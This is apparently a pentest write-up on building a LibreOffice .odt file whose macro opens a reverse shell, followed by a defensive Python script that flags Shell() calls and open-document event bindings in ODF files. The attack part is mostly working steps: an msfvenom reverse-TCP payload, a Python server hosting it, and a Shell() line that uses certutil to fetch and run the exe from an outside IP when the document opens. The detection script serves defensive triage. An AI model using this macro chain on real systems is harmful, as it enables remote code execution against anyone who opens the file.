# Exploitation

Getting a shell with an .odt file embedded with malicious macros.

Open LibreOffice by typing `libreoffice` in a terminal.

![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2FOWuqvxg0fby38x1bGfj4%2F2022-07-20_13-52.png?alt=media\&token=13e00665-f834-4d12-92e3-ca57050d3639)

![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2Fi4c5jhjMX6rV5IY0I33u%2F2022-07-20_13-53.png?alt=media\&token=6f8abdfa-aee5-4715-bcac-3876acf00893)

To create a macro we will go to Tools > Macros > Organize Macros > Basic.

We will then create a new macro, which we can name whatever we want.

![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2FxX8GrMJTrYoKhWsHWh4X%2F2022-07-20_13-56.png?alt=media\&token=2c152234-5e8d-4c02-ab50-fe03221dcad5)

![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2FnmWDV0nzpCHFqONUdqS0%2F2022-07-20_13-56_1.png?alt=media\&token=de18af41-2420-4fc3-aefb-88d73c9e161e)

We will type `Shell(" ")`.

Anything between the quotation marks will be executed.

So although there are other ways of doing this, I would rather have my payload have a chance of being executed and not be caught by an AV, by using the multi/handler, which automatically encodes the payload.

So we will generate our payload.

```
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.227 LPORT=443 -f exe -o lyethar-shell-reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: lyethar-shell-reverse.exe
```

And start a Python web server on port 80.

```
python3 -m http.server 80                                          
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

Inside the macro, between the quotation marks, we will paste this command, which will fetch our generated payload and execute it, resulting in a reverse shell.

```
Shell(“Cmd.exe C net use D Y * && cme.exe C certutil.exe -urlcache -split -f “”http://192.168.49.227:80/lyethar-shell.exe”” C:\Users\Public\lyethar.exe &  C:\Users\Public\lyethar.exe”)
```

Then we save the macro. Once saved, we attach the macro to an event that will execute it when somebody opens the file.

We will go to Tools > Customize > Events > Open Document > Macro... > Nameofmacro > Standard > Main

Save the file as .odt.

Upload and free money.

![](https://2742794510-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhNEcBmjpao37mR29JPHE%2Fuploads%2FO0f9cHikPqlJ4C04NxlN%2F2022-07-20_14-09.png?alt=media\&token=e0728ac9-0a55-4afb-bfce-a8a552557b3f)

Code execution.
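The document built above leaves two artifacts inside the .odt archive that can be checked before a file is opened: a Basic module containing a `Shell(` call, and an event listener that binds a macro to Open Document. The triage script below is an added example, not part of the original write-up. It assumes the layout LibreOffice writes (modules under `Basic/`, the Open Document binding saved as a `dom:load` listener in `content.xml`); the sample archive and `PLACEHOLDER-COMMAND` are constructed.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET  # prefer defusedxml for untrusted files
ODF_SCRIPT = "{urn:oasis:names:tc:opendocument:xmlns:script:1.0}"
XLINK = "{http://www.w3.org/1999/xlink}"
SHELL_CALL = re.compile(r"\bShell\s*\(", re.IGNORECASE)

def triage_odt(data: bytes) -> dict:
    """List Basic modules, Shell() lines and event-bound macros in an ODF file."""
    report = {"modules": [], "shell_lines": [], "event_bindings": []}
    with zipfile.ZipFile(io.BytesIO(data)) as odt:
        for name in odt.namelist():
            if name.startswith("Basic/") and name.endswith(".xml"):
                root = ET.fromstring(odt.read(name))
                if not root.tag.endswith("}module"):
                    continue  # library index files (script-lb.xml, script-lc.xml)
                report["modules"].append(name)
                for line in (root.text or "").splitlines():
                    if SHELL_CALL.search(line):
                        report["shell_lines"].append((name, line.strip()))
        if "content.xml" in odt.namelist():
            content = ET.fromstring(odt.read("content.xml"))
            for ev in content.iter(ODF_SCRIPT + "event-listener"):
                report["event_bindings"].append(
                    (ev.get(ODF_SCRIPT + "event-name"), ev.get(XLINK + "href")))
    # Shell() plus a macro bound to document load: runs when the file is opened
    report["auto_exec_shell"] = bool(report["shell_lines"]) and any(
        event == "dom:load" for event, _ in report["event_bindings"])
    return report

# Constructed sample: a minimal ODT-like archive holding a placeholder command.
MODULE = ('<script:module xmlns:script="http://openoffice.org/2000/script" '
          'script:name="Module1" script:language="StarBasic">Sub Main\n'
          '    Shell(&quot;PLACEHOLDER-COMMAND&quot;)\nEnd Sub</script:module>')
CONTENT = ('<office:document-content'
           ' xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"'
           ' xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0"'
           ' xmlns:xlink="http://www.w3.org/1999/xlink">'
           '<office:scripts><office:event-listeners><script:event-listener'
           ' script:language="ooo:script" script:event-name="dom:load" xlink:href='
           '"vnd.sun.star.script:Standard.Module1.Main?language=Basic&amp;location=document"'
           '/></office:event-listeners></office:scripts></office:document-content>')

def build_sample(bind_event: bool = True) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        z.writestr("Basic/Standard/Module1.xml", MODULE)
        if bind_event:
            z.writestr("content.xml", CONTENT)
    return buf.getvalue()
if __name__ == "__main__": print(triage_odt(build_sample()))
```

A hit on `auto_exec_shell` is a triage signal for mail or upload filtering, not a verdict: the macro source and the listener target still need a manual look.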

